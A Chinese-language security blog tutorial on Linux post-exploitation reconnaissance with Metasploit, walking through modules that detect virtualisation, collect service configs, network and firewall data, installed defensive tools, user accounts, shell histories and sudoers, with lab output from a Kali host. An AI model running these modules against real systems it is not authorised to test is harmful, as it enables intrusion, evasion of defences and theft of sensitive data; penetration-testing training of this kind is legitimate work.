Linux后渗透之信息收集(metasploit)

  • A+
所属分类:安全文章

前言:突然发现linux信息收集很麻烦,所以给大家分享 “metasploit”下针对linux的信息收集一件模块非常实用.

检查虚拟机

所述checkvm模块尝试来确定系统是否正在运行的虚拟环境的内部和如果是这样,哪一个。该模块支持 Hyper-V、VMWare、VirtualBox、Xen 和 QEMU/KVM 的检测。

msf > use post/linux/gather/checkvm
msf post(checkvm) > show options

Module options (post/linux/gather/checkvm):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(checkvm) > run

[*] Gathering System info ....
[+] This appears to be a 'VMware' virtual machine
[*] Post module execution completed

枚举配置

enum_configs上普遍安装的应用程序和服务,如Apache,MySQL和桑巴,Sendmail的,等发现模块收集配置文件如果在默认路径中找到一个配置文件,该模块将认为是我们想要的文件。

msf  > use post/linux/gather/enum_configs 
msf post(enum_configs) > show options

Module options (post/linux/gather/enum_configs):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_configs) > run

[*] Running module against kali
[*] Info:
[*] Kali GNU/Linux 1.0.6
[*] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] apache2.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_735045.txt
[*] ports.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_787442.txt
[*] nginx.conf stored in /root/.msf4/loot/20140228005504_default_192.168.1.109_linux.enum.conf_248658.txt
[*] my.cnf stored in /root/.msf4/loot/20140228005505_default_192.168.1.109_linux.enum.conf_577389.txt
[*] shells stored in /root/.msf4/loot/20140228005507_default_192.168.1.109_linux.enum.conf_583272.txt
[*] sepermit.conf stored in /root/.msf4/loot/20140228005507_default_192.168.1.109_linux.enum.conf_027227.txt
[*] ca-certificates.conf stored in /root/.msf4/loot/20140228005508_default_192.168.1.109_linux.enum.conf_626893.txt
[*] access.conf stored in /root/.msf4/loot/20140228005508_default_192.168.1.109_linux.enum.conf_619382.txt
[*] rpc stored in /root/.msf4/loot/20140228005509_default_192.168.1.109_linux.enum.conf_666867.txt
[*] debian.cnf stored in /root/.msf4/loot/20140228005509_default_192.168.1.109_linux.enum.conf_173984.txt
[*] chkrootkit.conf stored in /root/.msf4/loot/20140228005510_default_192.168.1.109_linux.enum.conf_025881.txt
[*] logrotate.conf stored in /root/.msf4/loot/20140228005510_default_192.168.1.109_linux.enum.conf_438551.txt
[*] smb.conf stored in /root/.msf4/loot/20140228005511_default_192.168.1.109_linux.enum.conf_545804.txt
[*] ldap.conf stored in /root/.msf4/loot/20140228005511_default_192.168.1.109_linux.enum.conf_464721.txt
[*] sysctl.conf stored in /root/.msf4/loot/20140228005513_default_192.168.1.109_linux.enum.conf_077261.txt
[*] proxychains.conf stored in /root/.msf4/loot/20140228005513_default_192.168.1.109_linux.enum.conf_855958.txt
[*] snmp.conf stored in /root/.msf4/loot/20140228005514_default_192.168.1.109_linux.enum.conf_291777.txt
[*] Post module execution completed

枚举网络

所述enum_network从目标系统模块枚举网络信息的防火墙规则,接口,无线信息,打开和监听端口,活动的网络连接,DNS信息和SSH信息。

msf > use post/linux/gather/enum_network 
msf post(enum_network) > show options

Module options (post/linux/gather/enum_network):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_network) > run

[*] Running module against kali
[*] Module running as root
[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Collecting data...
[*] Network config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_533784.txt
[*] Route table stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_173980.txt
[*] Firewall config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_332941.txt
[*] DNS config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_007812.txt
[*] SSHD config stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_912697.txt
[*] Host file stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_477226.txt
[*] Active connections stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_052505.txt
[*] Wireless information stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_069586.txt
[*] Listening ports stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_574507.txt
[*] If-Up/If-Down stored in /root/.msf4/loot/20140228005655_default_192.168.1.109_linux.enum.netwo_848840.txt
[*] Post module execution completed

枚举保护

enum_protections模块试图找到某些安装的应用程序,可用于防止,或发现我们的攻击,这是通过查找特定的二进制位置完了,看看他们是否确实可执行文件。例如,如果我们能够将 'snort' 作为命令运行,我们假设它是我们正在寻找的文件之一。该模块旨在涵盖各种防病毒、rootkit、IDS/IPS、防火墙和其他软件。

msf > use post/linux/gather/enum_protections
msf post(enum_protections) > show options

Module options (post/linux/gather/enum_protections):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_protections) > run

[*] Running module against kali
[*] Info:
[*] Kali GNU/Linux 1.0.6
[*] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Finding installed applications...
[+] truecrypt found: /usr/bin/truecrypt
[+] logrotate found: /usr/sbin/logrotate
[+] chkrootkit found: /usr/sbin/chkrootkit
[+] lynis found: /usr/sbin/lynis
[+] tcpdump found: /usr/sbin/tcpdump
[+] proxychains found: /usr/bin/proxychains
[+] wireshark found: /usr/bin/wireshark
[*] Installed applications saved to notes.
[*] Post module execution completed

枚举系统

enum_system模块收集系统信息。它收集已安装的包、已安装的服务、挂载信息、用户列表、用户 bash 历史记录和 cron 作业

msf > use post/linux/gather/enum_system 
msf post(enum_system) > show options

Module options (post/linux/gather/enum_system):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_system) > run

[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] Linux version stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_186949.txt
[*] User accounts stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_538758.txt
[*] Installed Packages stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_116127.txt
[*] Running Services stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_805781.txt
[*] Cron jobs stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_460600.txt
[*] Disk info stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_538625.txt
[*] Logfiles stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_922920.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20140228005325_default_192.168.1.109_linux.enum.syste_076798.txt
[*] Post module execution completed

用户具体信息HISTORY

enum_users_history模块收集用户的具体信息。用户列表、bash 历史、mysql 历史、vim 历史、lastlog 和 sudoers。

msf > use post/linux/gather/enum_users_history
msf post(enum_users_history) > show options

Module options (post/linux/gather/enum_users_history):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(enum_users_history) > run

[+] Info:
[+] Kali GNU/Linux 1.0.6
[+] Linux kali 3.12-kali1-486 #1 Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
[*] History for root stored in /root/.msf4/loot/20140228005914_default_192.168.1.109_linux.enum.users_491309.txt
[*] History for root stored in /root/.msf4/loot/20140228005930_default_192.168.1.109_linux.enum.users_349754.txt
[*] Last logs stored in /root/.msf4/loot/20140228010003_default_192.168.1.109_linux.enum.users_170027.txt
[*] Sudoers stored in /root/.msf4/loot/20140228010003_default_192.168.1.109_linux.enum.users_210141.txt
[*] Post module execution completed


本文始发于微信公众号(5号黯区):Linux后渗透之信息收集(metasploit)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: